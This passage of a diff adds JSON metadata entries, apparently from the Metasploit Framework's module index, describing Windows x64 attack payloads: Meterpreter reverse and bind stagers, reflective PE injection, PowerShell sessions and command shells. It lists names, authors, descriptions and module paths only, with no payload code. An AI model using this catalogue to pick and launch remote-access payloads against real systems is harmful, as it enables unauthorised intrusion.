attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/meterpreter/reverse_tcp_uuid": { + "name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/meterpreter/reverse_winhttp": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/windows/x64/meterpreter/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_windows/x64/meterpreter/reverse_winhttps": { + "name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/windows/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_windows/x64/meterpreter_bind_named_pipe": { + "name": "Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_bind_tcp": { + "name": "Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_http": { + "name": "Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_https": { + "name": "Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/windows/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_ipv6_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/windows/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/meterpreter_reverse_tcp": { + "name": "Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/windows/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "OJ Reeves", + "sf " + ], + "description": "Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/peinject/bind_ipv6_tcp": { + "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/peinject/bind_named_pipe": { + "name": "Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "UserExistsError" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_windows/x64/peinject/bind_tcp": { + "name": "Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager", + "fullname": "payload/windows/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_windows/x64/peinject/bind_tcp_rc4": { + "name": "Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_windows/x64/peinject/bind_tcp_uuid": { + "name": "Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_windows/x64/peinject/reverse_named_pipe": { + "name": "Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_windows/x64/peinject/reverse_tcp": { + "name": "Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager", + "fullname": "payload/windows/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf " + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_windows/x64/peinject/reverse_tcp_rc4": { + "name": "Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_windows/x64/peinject/reverse_tcp_uuid": { + "name": "Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/windows/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_windows/x64/pingback_reverse_tcp": { + "name": "Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/windows/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7" + ], + "description": "Connect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/powershell_bind_tcp": { + "name": "Windows Interactive Powershell Session, Bind TCP", + "fullname": "payload/windows/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/powershell_reverse_tcp": { + "name": "Windows Interactive Powershell Session, Reverse TCP", + "fullname": "payload/windows/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/powershell_reverse_tcp_ssl": { + "name": "Windows Interactive Powershell Session, Reverse TCP SSL", + "fullname": "payload/windows/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Listen for a connection and spawn an interactive powershell session over SSL", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "windows/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/x64/shell/bind_ipv6_tcp": { + "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/windows/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf " + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_windows/x64/shell/bind_ipv6_tcp_uuid": { + "name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/windows/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "OJ Reeves" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_windows/x64/shell/bind_named_pipe": { + "name": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/windows/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "sf ", + "UserExistsError" + ], + "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + 